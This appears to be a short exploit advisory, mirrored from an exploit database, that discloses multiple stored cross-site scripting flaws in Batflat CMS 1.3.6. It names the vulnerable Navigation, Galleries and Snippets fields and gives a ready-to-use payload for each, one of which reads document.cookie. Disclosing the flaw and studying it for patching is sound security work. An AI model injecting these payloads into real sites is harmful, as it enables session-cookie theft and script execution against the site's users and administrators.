Share
## https://sploitus.com/exploit?id=PACKETSTORM:161505
# Exploit Title: Batflat CMS 1.3.6 - 'multiple' Stored XSS  
# Date: 22/02/2021  
# Exploit Author: Tadjmen  
# Vendor Homepage: https://batflat.org/  
# Software Link: https://github.com/sruupl/batflat/archive/master.zip  
# Version: 1.3.6  
# Tested on: Xammpp on Windows, Firefox Newest  
# CVE : N/A  
  
Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6  
  
Login with editor account with rights to Navigation, Galleries, Snippets  
  
Navigation  
- Add link  
payload: "><img src=x onerror=alert(document.cookie)>  
  
Galleries  
- Add gallery  
payload: mlem"><svg/onload=alert(1)>  
  
Snippets  
- Add Snippets  
payload: mlem"><svg/onload=alert("TuongNC")>  
  
More information:  
https://github.com/sruupl/batflat/issues/105